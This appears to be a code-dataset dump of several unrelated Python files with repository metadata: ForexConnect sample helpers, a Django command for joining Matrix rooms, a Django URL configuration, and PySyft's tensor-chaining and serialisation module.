# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://fxcodebase.com/licenses/open-source/license.html
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import __main__
import datetime
import traceback
import argparse
import sys
from forexconnect import fxcorepy
logging.basicConfig(filename='{0}.log'.format(__main__.__file__), level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s', datefmt='%m.%d.%Y %H:%M:%S')
console = logging.StreamHandler(sys.stdout)
console.setLevel(logging.INFO)
logging.getLogger('').addHandler(console)
# function for print available descriptors
| 44.527273 | 113 | 0.5441 | # Copyright 2018 Gehtsoft USA LLC
# Licensed under the license derived from the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://fxcodebase.com/licenses/open-source/license.html
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import __main__
import datetime
import traceback
import argparse
import sys
from forexconnect import fxcorepy
logging.basicConfig(filename='{0}.log'.format(__main__.__file__), level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s', datefmt='%m.%d.%Y %H:%M:%S')
console = logging.StreamHandler(sys.stdout)
console.setLevel(logging.INFO)
logging.getLogger('').addHandler(console)
def add_main_arguments(parser: argparse.ArgumentParser):
parser.add_argument('-l',
metavar="LOGIN",
required=True,
help='Your user name.')
parser.add_argument('-p',
metavar="PASSWORD",
required=True,
help='Your password.')
parser.add_argument('-u',
metavar="URL",
required=True,
help='The server URL. For example,\
http://www.fxcorporate.com/Hosts.jsp.')
parser.add_argument('-c',
metavar="CONNECTION",
required=True,
help='The connection name. For example, \
"Demo" or "Real".')
parser.add_argument('-session',
help='The database name. Required only for users who\
have accounts in more than one database.\
Optional parameter.')
parser.add_argument('-pin',
help='Your pin code. Required only for users who have \
a pin. Optional parameter.')
def add_candle_open_price_mode_argument(parser: argparse.ArgumentParser):
parser.add_argument('-o',
metavar="CANDLE_OPEN_PRICE_MODE",
default="prev_close",
help='Ability to set the open price candles mode. \
Possible values are first_tick, prev_close. For more information see description \
of O2GCandleOpenPriceMode enumeration. Optional parameter.')
def add_instrument_timeframe_arguments(parser: argparse.ArgumentParser, timeframe: bool = True):
parser.add_argument('-i',
metavar="INSTRUMENT",
default="EUR/USD",
help='An instrument which you want to use in sample. \
For example, "EUR/USD".')
if timeframe:
parser.add_argument('-timeframe',
metavar="TIMEFRAME",
default="m1",
help='Time period which forms a single candle. \
For example, m1 - for 1 minute, H1 - for 1 hour.')
def add_direction_rate_lots_arguments(parser: argparse.ArgumentParser, direction: bool = True, rate: bool = True,
lots: bool = True):
if direction:
parser.add_argument('-d', metavar="TYPE", required=True,
help='The order direction. Possible values are: B - buy, S - sell.')
if rate:
parser.add_argument('-r', metavar="RATE", required=True, type=float,
help='Desired price of an entry order.')
if lots:
parser.add_argument('-lots', metavar="LOTS", default=1, type=int,
help='Trade amount in lots.')
def add_account_arguments(parser: argparse.ArgumentParser):
parser.add_argument('-account', metavar="ACCOUNT",
help='An account which you want to use in sample.')
def valid_datetime(check_future: bool):
def _valid_datetime(str_datetime: str):
date_format = '%m.%d.%Y %H:%M:%S'
try:
result = datetime.datetime.strptime(str_datetime, date_format).replace(
tzinfo=datetime.timezone.utc)
if check_future and result > datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc):
msg = "'{0}' is in the future".format(str_datetime)
raise argparse.ArgumentTypeError(msg)
return result
except ValueError:
now = datetime.datetime.now()
msg = "The date '{0}' is invalid. The valid data format is '{1}'. Example: '{2}'".format(
str_datetime, date_format, now.strftime(date_format))
raise argparse.ArgumentTypeError(msg)
return _valid_datetime
def add_date_arguments(parser: argparse.ArgumentParser, date_from: bool = True, date_to: bool = True):
if date_from:
parser.add_argument('-datefrom',
metavar="\"m.d.Y H:M:S\"",
help='Date/time from which you want to receive\
historical prices. If you leave this argument as it \
is, it will mean from last trading day. Format is \
"m.d.Y H:M:S". Optional parameter.',
type=valid_datetime(True)
)
if date_to:
parser.add_argument('-dateto',
metavar="\"m.d.Y H:M:S\"",
help='Datetime until which you want to receive \
historical prices. If you leave this argument as it is, \
it will mean to now. Format is "m.d.Y H:M:S". \
Optional parameter.',
type=valid_datetime(False)
)
def add_report_date_arguments(parser: argparse.ArgumentParser, date_from: bool = True, date_to: bool = True):
if date_from:
parser.add_argument('-datefrom',
metavar="\"m.d.Y H:M:S\"",
help='Datetime from which you want to receive\
combo account statement report. If you leave this argument as it \
is, it will mean from last month. Format is \
"m.d.Y H:M:S". Optional parameter.',
type=valid_datetime(True)
)
if date_to:
parser.add_argument('-dateto',
metavar="\"m.d.Y H:M:S\"",
help='Datetime until which you want to receive \
combo account statement report. If you leave this argument as it is, \
it will mean to now. Format is "m.d.Y H:M:S". \
Optional parameter.',
type=valid_datetime(True)
)
def add_max_bars_arguments(parser: argparse.ArgumentParser):
parser.add_argument('-quotescount',
metavar="MAX",
default=0,
type=int,
help='Max number of bars. 0 - Not limited')
def add_bars_arguments(parser: argparse.ArgumentParser):
parser.add_argument('-bars',
metavar="COUNT",
default=3,
type=int,
help='Build COUNT bars. Optional parameter.')
def print_exception(exception: Exception):
logging.error("Exception: {0}\n{1}".format(exception, traceback.format_exc()))
# function for print available descriptors
def session_status_changed(session: fxcorepy.O2GSession,
status: fxcorepy.AO2GSessionStatus.O2GSessionStatus):
logging.info("Status: " + str(status))
if status == fxcorepy.AO2GSessionStatus.O2GSessionStatus.TRADING_SESSION_REQUESTED:
descriptors = session.trading_session_descriptors
logging.info("Session descriptors:")
logging.info(" {0:>7} | {1:>7} | {2:>30} | {3:>7}\n".format("id", "name", "description", "requires pin"))
for desc in descriptors:
logging.info(" {0:>7} | {1:>7} | {2:>30} | {3:>7}\n".format(desc.id, desc.name,
desc.description,
str(desc.requires_pin)))
def diff_month(year: int, month: int, date2: datetime):
return (year - date2.year) * 12 + month - date2.month
def convert_timeframe_to_seconds(unit: fxcorepy.O2GTimeFrameUnit, size: int):
current_unit = unit
current_size = size
step = 1
if current_unit == fxcorepy.O2GTimeFrameUnit.MIN:
step = 60 # leads to seconds
elif current_unit == fxcorepy.O2GTimeFrameUnit.HOUR:
step = 60*60
elif current_unit == fxcorepy.O2GTimeFrameUnit.DAY:
step = 60*60*24
elif current_unit == fxcorepy.O2GTimeFrameUnit.WEEK:
step = 60*60*24*7
elif current_unit == fxcorepy.O2GTimeFrameUnit.MONTH:
step = 60 * 60 * 24 * 30
elif current_unit == fxcorepy.O2GTimeFrameUnit.TICK:
step = 1
return step * current_size
| 8,377 | 0 | 321 |
05ff2eee1834701da388e3350f5937c4d3038e22 | 1,635 | py | Python | extensions/matrix/management/commands/matrix_room_join.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | extensions/matrix/management/commands/matrix_room_join.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | extensions/matrix/management/commands/matrix_room_join.py | nirgal/ngw | 0a28e8f12cb342a20ca3456e2a2ab91dd9c898be | [
"BSD-2-Clause"
] | null | null | null | import logging
from django.core.management.base import BaseCommand, CommandError
from ngw.extensions.matrix import matrix
| 34.787234 | 79 | 0.593272 | import logging
from django.core.management.base import BaseCommand, CommandError
from ngw.extensions.matrix import matrix
class Command(BaseCommand):
help = 'update matrix user information'
def add_arguments(self, parser):
parser.add_argument(
'user',
)
parser.add_argument(
'room',
help='room id (starting with !) or room alias (starting with #)',
)
def handle(self, *args, **options):
logger = logging.getLogger('command')
verbosity = options.get('verbosity', None)
if verbosity == 3:
logger.setLevel(logging.DEBUG)
elif verbosity == 2:
logger.setLevel(logging.INFO)
elif verbosity == 1:
logger.setLevel(logging.WARNING)
elif verbosity == 0:
logger.setLevel(logging.ERROR)
# else value settings['LOGGING']['command']['level'] is used
user_id = options['user']
if not user_id.startswith('@'):
raise CommandError(f'user_id should start with "@".')
if not user_id.endswith(f':{matrix.DOMAIN}'):
raise CommandError(f'user_id should ends with ":{matrix.DOMAIN}".')
room_id = options['room']
if not room_id.startswith('#') and not room_id.startswith('!'):
raise CommandError('room_id should be and id (starting with !) or'
'an alias (starting with #).')
if not room_id.endswith(f':{matrix.DOMAIN}'):
raise CommandError(f'room_id should ends with ":{matrix.DOMAIN}".')
matrix.room_join(user_id, room_id)
| 1,383 | 104 | 23 |
0f586d06f7f6008b5af6b8a12581096e18f21c4a | 416 | py | Python | ps4you/ps4you/urls.py | bogomaz1987/ps4you | 7222425fb469dd966ba33de11405b9aa5e37ba67 | [
"Apache-2.0"
] | null | null | null | ps4you/ps4you/urls.py | bogomaz1987/ps4you | 7222425fb469dd966ba33de11405b9aa5e37ba67 | [
"Apache-2.0"
] | 2 | 2020-06-05T17:41:58.000Z | 2021-06-01T22:00:29.000Z | ps4you/ps4you/urls.py | bogomaz1987/ps4you | 7222425fb469dd966ba33de11405b9aa5e37ba67 | [
"Apache-2.0"
] | null | null | null | from django.conf.urls import include
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
# path('searchableselect/', include('searchableselect.urls')),
path('', include('page.urls')),
path('game/', include('game.urls')),
path('client/', include('client.urls')),
path('auth/', include('social_django.urls', namespace='social'))
]
| 26 | 68 | 0.670673 | from django.conf.urls import include
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
# path('searchableselect/', include('searchableselect.urls')),
path('', include('page.urls')),
path('game/', include('game.urls')),
path('client/', include('client.urls')),
path('auth/', include('social_django.urls', namespace='social'))
]
| 0 | 0 | 0 |
c376f410b1597c029143f8b2507b3a11656225d2 | 44,416 | py | Python | syft/core/frameworks/torch/tensor.py | codevedas/PySyft | 8017b7f04434e797d0721e34488f637bf4865385 | [
"Apache-2.0"
] | null | null | null | syft/core/frameworks/torch/tensor.py | codevedas/PySyft | 8017b7f04434e797d0721e34488f637bf4865385 | [
"Apache-2.0"
] | null | null | null | syft/core/frameworks/torch/tensor.py | codevedas/PySyft | 8017b7f04434e797d0721e34488f637bf4865385 | [
"Apache-2.0"
] | null | null | null | import json
import re
import torch
import random
import syft as sy
from ... import utils
from . import utils as torch_utils
import logging
import numpy as np
class _SyftTensor(object):
"""
Super class for all Syft tensors, that contains all the specific syft functions
"""
def set_id(self, new_id):
"""
This changes the id of a tensor.
:param new_id: a string or integer id
:return: returns self, for convenience.
"""
if(new_id not in self.owner._objects):
if not hasattr(self, 'old_ids'):
self.old_ids = set()
self.old_ids.add(self.id)
self.owner.register_object(self, new_id)
return self
else:
raise KeyError("There is already a tensor with that ID - please choose another.")
@property
@parent.setter
@classmethod
def handle_call(cls, command, owner):
"""
Receive a command and an owner and before sending it downward the syft chain,
Performs different operations like:
- command substitution
- args substitution
- command overloading with special methods or arguments
"""
attr = command['command']
args = command['args']
kwargs = command['kwargs']
has_self = command['has_self']
# Overload methods
if has_self and cls.is_overloaded_method(attr):
self_ = command['self']
result = getattr(self_, attr)(*args, **kwargs)
# Overload functions
elif not has_self and cls.is_overloaded_function(attr):
overload_function = cls.overload_functions.get(attr)
result = overload_function(*args, **kwargs)
else:
# replace a function attr with an existing other
if attr in cls.replaced_functions():
command['command'] = cls.replaced_functions(attr)
# Or do whatever you want, but be careful not to overwrite the args!
# (...)
# Get the next node type and update in command tensorvar with tensorvar.child
next_command, child_type = torch_utils.prepare_child_command(
command, replace_tensorvar_with_child=True)
# Forward the call to the next child
result = child_type.handle_call(next_command, owner)
if result is None:
return result
if not isinstance(result, (int, float, str, bool)):
# Insert the new node just before the wrapper
syft_response = cls.syft_wrap(result, owner)
else:
syft_response = result
return syft_response
def ser(self, private, as_dict=True):
"""
General method for serializing a Syft object. Specific tensors like _PointerTensor
should overload this method.
"""
data = {
'owner': self.owner.id,
'id': self.id,
'torch_type': self.torch_type
}
if self.child is not None and not torch_utils.is_tensor(self.child):
data['child'] = self.child.ser(private, as_dict)
if as_dict:
return {'__{}__'.format(self.__class__.__name__): data}
else:
return json.dumps({'__{}__'.format(self.__class__.__name__): data}) + "\n"
@classmethod
def deser_routing(cls, dct, worker, acquire):
"""
Method analysing the dict given to see which Syft Tensor should deserialized,
and forwarding the call
[Is this case note that the dct param is assumed to have a single key, which is
compatible with our encode/decode process (ex: {'___PointerTensor__': {...} })]
"""
pat = re.compile('__(.+)__')
for key, obj in dct.items(): # A trick, we don't really loop
obj_type = pat.search(key).group(1)
if torch_utils.is_syft_tensor(obj_type):
if obj_type == '_LocalTensor':
return sy._LocalTensor.deser(obj, worker, acquire)
elif obj_type == '_PointerTensor':
return sy._PointerTensor.deser(obj, worker, acquire)
else:
syft_type = torch.guard['syft.' + obj_type]
return syft_type.deser(obj, worker, acquire)
@classmethod
def deser(cls, msg_obj, worker, acquire):
"""
General method for de-serializing a Syft object. Specific tensors like _PointerTensor
should overload this method.
"""
if acquire: # We need to register the info given
syft_obj = cls(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
owner=worker,
id=msg_obj['id'],
skip_register=True
)
if 'child' in msg_obj:
syft_child = cls.deser_routing(msg_obj['child'], worker, acquire)
syft_obj.child = syft_child
syft_child.parent = syft_obj
else: # We point at the info which generally we can't really have
# We make sure we are not creating a duplicate pointer
previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
if previous_pointer is None:
syft_obj = sy._PointerTensor(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
location=msg_obj['owner'],
id_at_location=msg_obj['id'],
owner=worker,
id=None,
skip_register=True)
else:
syft_obj = previous_pointer
return syft_obj
def on(self, wrapper):
"""
Used to add a new node at the top of the chain, just before the tensorvar wrapper
Example with _PlusIsMinusTensor:
x = sy.FloatTensor([1, 2, 3]) # the chain is FloatTensor > _LocalTensor
x = sy._PlusIsMinusTensor().on(x) # the chain is FloatTensor > _PlusIsMinusTensor > _LocalTensor
"""
cls = type(self)
# Assign the newly created tensor to the good owner and torch_type
self.torch_type = wrapper.child.torch_type
self.owner = wrapper.child.owner
# Insert self between wrapper and wrapper child
torch_utils.wrap_command_with(wrapper.child, wrapper=self)
torch_utils.wrap_command_with(self, wrapper=wrapper)
# In case wrapper is a variable, do the same with data and grad (if necessary)
if torch_utils.is_variable(wrapper):
wrapper.data = cls().on(wrapper.data)
if torch_utils.is_variable(wrapper.grad):
wrapper.grad = cls().on(wrapper.grad)
if wrapper.grad is None and wrapper.data.dim() > 0:
# create an empty envelope in wrapper.grad
wrapper.init_grad_()
# Build the chain with _PlusIsMinusTensor
wrapper_grad = cls().on(wrapper.grad)
# Insert the gradient within its chain
wrapper.grad.native_set_(wrapper_grad)
return wrapper
def wrap(self):
"""
Wrap a syft node with a torch wrapper
"""
wrapper = torch.guard[self.torch_type]()
self.owner.rm_obj(wrapper.child.id)
wrapper.child = self
torch_utils.fix_chain_ends(wrapper)
return wrapper
@classmethod
def syft_wrap(cls, result, owner):
"""
Wrap a torch node with a syft wrapper
"""
# Insert the new syft node just before the wrapper
syft_wrapper = cls(child=result, owner=owner)
result.parent = syft_wrapper
if torch_utils.is_variable(result.torch_type):
syft_response_data = cls(child=result.data, owner=owner)
result.data.parent = syft_response_data
syft_wrapper.data = syft_response_data
# TODO: same for grad ?
return syft_wrapper
@classmethod
def is_overloaded_method(cls, attr):
"""
State if a function name corresponds to a Syft Tensor method which
overloads a torch method
"""
exclude = ['on', '__init__', 'native___init__', '__repr__', '__str__', 'create_pointer',
'ser', 'deser', 'handle_call']
if attr in exclude:
return False
if hasattr(getattr(cls, attr), '__module__') \
and getattr(cls, attr).__module__ == 'syft.core.frameworks.torch.tensor':
return True
return False
@classmethod
def is_overloaded_function(cls, attr):
"""
State if a function name corresponds to an overloaded function by the Syft
tensor, which declared the corresponding overloading function in
cls.overload_functions
"""
attr = attr.split('.')[-1]
overloaded_functions = [
func for func in dir(cls.overload_functions)
if re.match(r'__(.*)__', func) is None
and func != 'get'
]
return attr in overloaded_functions
@classmethod
def replaced_functions(cls, attr=None):
"""
If attr is none, return all the function substitution a Syft Tensor class
wants to perform.
Else, return the substitution corresponding to attr
"""
if attr is None:
return cls.substitution_table
else:
return cls.substitution_table[attr]
substitution_table = {}
class _PlusIsMinusTensor(_SyftTensor):
"""
Example of a custom overloaded _SyftTensor
Role:
Converts all add operations into sub/minus ones.
"""
# The table of command you want to replace
substitution_table = {
'torch.add': 'torch.add'
}
class overload_functions:
"""
Put here the functions you want to overload
Beware of recursion errors.
"""
@staticmethod
@staticmethod
# Put here all the methods you want to overload
def add(self, arg):
"""
Overload the add method and execute another function or method with the provided args
"""
_response = self.sub(arg)
return _response
def abs(self):
"""
Overload the abs() method and execute another function
"""
return torch.abs(self)
class _TorchObject(object):
"""
This tensor is simply a more convenient way to add custom
functions to all Torch tensor types, including Torch Variable.
Note that it is the parent class of the two following classes:
_TorchTensor and a_TorchVariable
"""
__module__ = 'syft'
def move(self, worker, new_id=None):
"""
Give the end leaf of the chain to worker,
just like if the last elmt was send its child
to worker
self->alice->obj [worker] => self->alice->worker->obj
"""
raise NotImplementedError('Move is not supported anymore.')
if isinstance(worker, (int, str)):
worker = self.owner.get_worker(worker)
if new_id is None:
new_id = random.randint(0, 10e10)
if isinstance(self.child, sy._PointerTensor):
pointer = self.child
else:
pointer = None
if pointer is None:
return self.send(worker, new_id)
command, _ = pointer.compile_command('move',
(worker.id, new_id),
{},
True)
response = pointer.owner.send_torch_command(recipient=pointer.location,
message=command)
return self
| 40.014414 | 134 | 0.579431 | import json
import re
import torch
import random
import syft as sy
from ... import utils
from . import utils as torch_utils
import logging
import numpy as np
class _SyftTensor(object):
"""
Super class for all Syft tensors, that contains all the specific syft functions
"""
def __init__(self, child=None, parent=None, torch_type=None, owner=None, id=None, skip_register=False):
if torch_utils.is_syft_tensor(child):
if torch_type is None:
torch_type = child.torch_type
if owner is None:
owner = child.owner
self.id = id
# self.old_ids = None - this will only get initialized if self.set_id() is called, but i'm referencing it
# in this comment so that people know it can exist. It's a set()
self.child = child
self.parent = parent
self.torch_type = torch_type
if self.child is not None:
try:
self.child.parent = self
except AttributeError: # for non-torch tensor child (can occur in __repr__)
pass
if owner is not None:
if not isinstance(owner, sy.core.workers.BaseWorker):
owner = self.child.owner.get_worker(owner)
self.owner = owner
def __str__(self):
return "[" + type(self).__name__ + " - id:" + str(self.id) + " owner:" + str(
self.owner.id) + "]"
def __repr__(self):
return self.__str__()
def set_id(self, new_id):
"""
This changes the id of a tensor.
:param new_id: a string or integer id
:return: returns self, for convenience.
"""
if(new_id not in self.owner._objects):
if not hasattr(self, 'old_ids'):
self.old_ids = set()
self.old_ids.add(self.id)
self.owner.register_object(self, new_id)
return self
else:
raise KeyError("There is already a tensor with that ID - please choose another.")
@property
def parent(self):
if hasattr(self, '_parent') and self._parent is not None:
return self._parent
else:
return None # Parents should be manually specified
@parent.setter
def parent(self, value):
self._parent = value
@classmethod
def handle_call(cls, command, owner):
"""
Receive a command and an owner and before sending it downward the syft chain,
Performs different operations like:
- command substitution
- args substitution
- command overloading with special methods or arguments
"""
attr = command['command']
args = command['args']
kwargs = command['kwargs']
has_self = command['has_self']
# Overload methods
if has_self and cls.is_overloaded_method(attr):
self_ = command['self']
result = getattr(self_, attr)(*args, **kwargs)
# Overload functions
elif not has_self and cls.is_overloaded_function(attr):
overload_function = cls.overload_functions.get(attr)
result = overload_function(*args, **kwargs)
else:
# replace a function attr with an existing other
if attr in cls.replaced_functions():
command['command'] = cls.replaced_functions(attr)
# Or do whatever you want, but be careful not to overwrite the args!
# (...)
# Get the next node type and update in command tensorvar with tensorvar.child
next_command, child_type = torch_utils.prepare_child_command(
command, replace_tensorvar_with_child=True)
# Forward the call to the next child
result = child_type.handle_call(next_command, owner)
if result is None:
return result
if not isinstance(result, (int, float, str, bool)):
# Insert the new node just before the wrapper
syft_response = cls.syft_wrap(result, owner)
else:
syft_response = result
return syft_response
def create_pointer(self, parent=None, ptr_id=None, owner=None, location=None,
id_at_location=None, register=False):
if owner is None:
owner = self.owner
if isinstance(owner, (str, int)):
owner = self.owner.get_worker(owner)
local_pointer = False
if location is None:
location = self.owner.id
local_pointer = True
if id_at_location is None:
id_at_location = self.id
if ptr_id is not None:
if ptr_id == id_at_location:
raise AttributeError(
"The PointerTensor and the tensor being pointed to cannot have the same id.")
else:
# Normally if there is no id specified, we keep the same as the original pointer
# Except if the pointer is local (we don't want to overwrite it!)
if not local_pointer:
ptr_id = self.id
else:
ptr_id = random.randint(0, 10e10)
if hasattr(self, 'torch_type') and self.torch_type is not None:
torch_type = self.torch_type
else:
torch_type = None
logging.warning("The torch tensor's child has no torch_type. Is it well formed?")
previous_pointer = owner.get_pointer_to(location, id_at_location)
if previous_pointer is None:
ptr = _PointerTensor(child=None,
parent=parent,
id=ptr_id,
torch_type=torch_type,
location=location,
id_at_location=id_at_location,
owner=owner,
skip_register=(not register))
if not register:
ptr.owner.rm_obj(ptr.id)
else:
ptr = previous_pointer
return ptr
def ser(self, private, as_dict=True):
"""
General method for serializing a Syft object. Specific tensors like _PointerTensor
should overload this method.
"""
data = {
'owner': self.owner.id,
'id': self.id,
'torch_type': self.torch_type
}
if self.child is not None and not torch_utils.is_tensor(self.child):
data['child'] = self.child.ser(private, as_dict)
if as_dict:
return {'__{}__'.format(self.__class__.__name__): data}
else:
return json.dumps({'__{}__'.format(self.__class__.__name__): data}) + "\n"
@classmethod
def deser_routing(cls, dct, worker, acquire):
"""
Method analysing the dict given to see which Syft Tensor should deserialized,
and forwarding the call
[Is this case note that the dct param is assumed to have a single key, which is
compatible with our encode/decode process (ex: {'___PointerTensor__': {...} })]
"""
pat = re.compile('__(.+)__')
for key, obj in dct.items(): # A trick, we don't really loop
obj_type = pat.search(key).group(1)
if torch_utils.is_syft_tensor(obj_type):
if obj_type == '_LocalTensor':
return sy._LocalTensor.deser(obj, worker, acquire)
elif obj_type == '_PointerTensor':
return sy._PointerTensor.deser(obj, worker, acquire)
else:
syft_type = torch.guard['syft.' + obj_type]
return syft_type.deser(obj, worker, acquire)
@classmethod
def deser(cls, msg_obj, worker, acquire):
"""
General method for de-serializing a Syft object. Specific tensors like _PointerTensor
should overload this method.
"""
if acquire: # We need to register the info given
syft_obj = cls(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
owner=worker,
id=msg_obj['id'],
skip_register=True
)
if 'child' in msg_obj:
syft_child = cls.deser_routing(msg_obj['child'], worker, acquire)
syft_obj.child = syft_child
syft_child.parent = syft_obj
else: # We point at the info which generally we can't really have
# We make sure we are not creating a duplicate pointer
previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
if previous_pointer is None:
syft_obj = sy._PointerTensor(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
location=msg_obj['owner'],
id_at_location=msg_obj['id'],
owner=worker,
id=None,
skip_register=True)
else:
syft_obj = previous_pointer
return syft_obj
def on(self, wrapper):
"""
Used to add a new node at the top of the chain, just before the tensorvar wrapper
Example with _PlusIsMinusTensor:
x = sy.FloatTensor([1, 2, 3]) # the chain is FloatTensor > _LocalTensor
x = sy._PlusIsMinusTensor().on(x) # the chain is FloatTensor > _PlusIsMinusTensor > _LocalTensor
"""
cls = type(self)
# Assign the newly created tensor to the good owner and torch_type
self.torch_type = wrapper.child.torch_type
self.owner = wrapper.child.owner
# Insert self between wrapper and wrapper child
torch_utils.wrap_command_with(wrapper.child, wrapper=self)
torch_utils.wrap_command_with(self, wrapper=wrapper)
# In case wrapper is a variable, do the same with data and grad (if necessary)
if torch_utils.is_variable(wrapper):
wrapper.data = cls().on(wrapper.data)
if torch_utils.is_variable(wrapper.grad):
wrapper.grad = cls().on(wrapper.grad)
if wrapper.grad is None and wrapper.data.dim() > 0:
# create an empty envelope in wrapper.grad
wrapper.init_grad_()
# Build the chain with _PlusIsMinusTensor
wrapper_grad = cls().on(wrapper.grad)
# Insert the gradient within its chain
wrapper.grad.native_set_(wrapper_grad)
return wrapper
def wrap(self):
"""
Wrap a syft node with a torch wrapper
"""
wrapper = torch.guard[self.torch_type]()
self.owner.rm_obj(wrapper.child.id)
wrapper.child = self
torch_utils.fix_chain_ends(wrapper)
return wrapper
@classmethod
def syft_wrap(cls, result, owner):
"""
Wrap a torch node with a syft wrapper
"""
# Insert the new syft node just before the wrapper
syft_wrapper = cls(child=result, owner=owner)
result.parent = syft_wrapper
if torch_utils.is_variable(result.torch_type):
syft_response_data = cls(child=result.data, owner=owner)
result.data.parent = syft_response_data
syft_wrapper.data = syft_response_data
# TODO: same for grad ?
return syft_wrapper
@classmethod
def is_overloaded_method(cls, attr):
"""
State if a function name corresponds to a Syft Tensor method which
overloads a torch method
"""
exclude = ['on', '__init__', 'native___init__', '__repr__', '__str__', 'create_pointer',
'ser', 'deser', 'handle_call']
if attr in exclude:
return False
if hasattr(getattr(cls, attr), '__module__') \
and getattr(cls, attr).__module__ == 'syft.core.frameworks.torch.tensor':
return True
return False
@classmethod
def is_overloaded_function(cls, attr):
"""
State if a function name corresponds to an overloaded function by the Syft
tensor, which declared the corresponding overloading function in
cls.overload_functions
"""
attr = attr.split('.')[-1]
overloaded_functions = [
func for func in dir(cls.overload_functions)
if re.match(r'__(.*)__', func) is None
and func != 'get'
]
return attr in overloaded_functions
@classmethod
def replaced_functions(cls, attr=None):
"""
If attr is none, return all the function substitution a Syft Tensor class
wants to perform.
Else, return the substitution corresponding to attr
"""
if attr is None:
return cls.substitution_table
else:
return cls.substitution_table[attr]
substitution_table = {}
class overload_functions:
pass
class _LocalTensor(_SyftTensor):
def __init__(self, child=None, parent=None, torch_type=None, owner=None, id=None, skip_register=False):
super().__init__(child=child, parent=parent, torch_type=torch_type, owner=owner, id=id,
skip_register=skip_register)
@classmethod
def handle_call(cls, syft_command, owner):
"""
Execute a forwarded command on the native tensor with native operations.
Receive a syft command and an owner, and converts it into command with
native torch args. Excute native operations and converts it back into
syft response using _LocalTensors.
"""
tensor_command, torch_type = torch_utils.prepare_child_command(syft_command,
replace_tensorvar_with_child=True)
torch_utils.assert_has_only_torch_tensorvars(tensor_command)
attr = tensor_command['command']
args = tensor_command['args']
kwargs = tensor_command['kwargs']
has_self = tensor_command['has_self']
if has_self:
self = tensor_command['self']
attr = torch._command_guard(attr, torch.tensorvar_methods)
command = getattr(self, "native_" + attr)
else:
attr = torch._command_guard(attr, torch.torch_modules)
elems = attr.split('.')
elems[-1] = 'native_' + elems[-1]
native_func_name = '.'.join(elems)
command = eval(native_func_name)
response = command(*args, **kwargs)
# TODO : control registration process
if response is None:
return response
if owner.id != owner.hook.local_worker.id:
if isinstance(response, (int, float, bool)):
response = sy.zeros(1) + response
elif isinstance(response, (np.ndarray, )):
response = sy.FloatTensor(response)
else:
if isinstance(response, (int, float, bool, np.ndarray)):
return response
# If the command is an in-place method, wrap self and return
if has_self and utils.is_in_place_method(attr):
# wrap the main element
torch_utils.wrap_command_with(response, syft_command['self'])
if torch_utils.is_variable(response):
# Also wrap the data if it's a variable (don't use wrap_command_with: the chain is not well formed yet)
syft_command['self'].child.data = response.data
response.data.parent = syft_command['self'].child.data.parent
# And wrap the grad if there is one
if response.grad is not None:
if response.grad.data.dim() > 0:
syft_command['self'].child.grad = response.grad
else:
syft_command['self'].child.grad.native_set_()
response.grad.parent = syft_command['self'].child.grad.parent
# Finally, fix the links .data and .grad
if response.grad is None:
torch_utils.link_var_chain_to_data_chain(syft_command['self'], response.data.child)
else:
torch_utils.link_var_chain_to_data_and_grad_chains(syft_command['self'], response.data.child, response.grad.child)
return_response = syft_command['self']
# Else, the response if not self. Iterate over the response(s) and wrap with a syft tensor
else:
responses = response if isinstance(response, tuple) else (response,)
syft_responses = []
for resp in responses:
if resp is None: # Don't wrap None
syft_responses.append(resp)
continue
if isinstance(resp, (int, float, bool)):
# if not final worker, convert into Float Tensor, which comes with a _LocalTensor
if owner.id != owner.hook.local_worker.id:
resp = sy.zeros(1) + resp
else: # Else don't wrap it
syft_responses.append(resp)
continue
syft_response = sy._LocalTensor(child=resp, parent=resp, owner=owner,
torch_type='syft.' + type(resp).__name__)
if torch_utils.is_variable(resp):
if resp.grad is None:
torch_utils.link_var_chain_to_data_chain(syft_response, resp.data.child)
else:
torch_utils.link_var_chain_to_data_and_grad_chains(syft_response, resp.data.child, resp.grad.child)
syft_responses.append(syft_response)
return_response = tuple(syft_responses) if len(syft_responses) > 1 else syft_responses[0]
return return_response
def ser(self, private, as_dict=True):
data = {
'owner': self.owner.id,
'id': self.id,
'torch_type': self.torch_type
}
if as_dict:
return {'___LocalTensor__': data}
else:
return json.dumps({'___LocalTensor__': data}) + "\n"
@staticmethod
def deser(msg_obj, worker, acquire):
if 'owner' not in msg_obj:
raise TypeError("sy._LocalTensor can't deserialize a non-valid sy._LocalTensor. "
"Do you wan to call sy.FloatTensor.deser() instead?")
if msg_obj['owner'] == worker.id:
logging.warning('_LocalTensor sent to itself')
if acquire: # We need to register the info given
syft_obj = sy._LocalTensor(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
owner=worker,
id=msg_obj['id'],
skip_register=True
)
else: # We point at the info which generally we can't really have
# We make sure we are not creating a duplicate pointer
previous_pointer = worker.get_pointer_to(msg_obj['owner'], msg_obj['id'])
if previous_pointer is None:
syft_obj = sy._PointerTensor(child=None,
parent=None,
torch_type=msg_obj['torch_type'],
location=msg_obj['owner'],
id_at_location=msg_obj['id'],
owner=worker,
id=None,
skip_register=True)
else:
syft_obj = previous_pointer
return syft_obj
